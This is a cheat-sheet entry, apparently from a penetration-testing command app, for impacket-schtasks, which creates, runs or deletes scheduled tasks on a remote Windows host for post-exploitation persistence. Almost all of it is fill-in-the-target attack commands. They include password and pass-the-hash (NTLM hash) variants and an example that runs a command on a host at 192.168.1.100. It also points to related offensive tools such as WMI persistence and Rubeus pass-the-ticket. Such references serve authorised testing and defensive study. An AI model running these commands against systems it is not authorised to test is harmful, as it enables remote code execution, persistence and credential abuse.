Impacket Scheduled Tasks
Create, delete, or run scheduled tasks on a remote host via ATSVC
- Tool
- impacket-schtasks
- Category
- Post-Exploitation / Persistence
- Platform
- linux
- Requires
- password
- Protocols
- SMB, RPC
Syntax
Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.
impacket-schtasks '<domain>/<user>:<password>'@'<ip>' -action create -taskname '<task>' -command '<cmd>'
Credential variants
The same attack using a different authentication material.
NTLM Hash requires NTLM hash
impacket-schtasks -hashes ':<hash>' '<domain>/<user>'@'<ip>' -action create -taskname '<task>' -command '<cmd>'
Delete Task requires password
impacket-schtasks '<domain>/<user>:<password>'@'<ip>' -action delete -taskname '<task>'
Examples
impacket-schtasks 'CORP.LOCAL/user:password'@192.168.1.100 -action create -taskname 'Updater' -command 'cmd.exe /c whoami > C:\\out.txt'
Tags
Related commands
- Impacket WMI Persist Install or remove WMI event subscriptions for remote persistence
- Rubeus ptt (Pass-the-Ticket) Inject a Kerberos ticket into the current logon session. Accepts base64 from asktgt/s4u…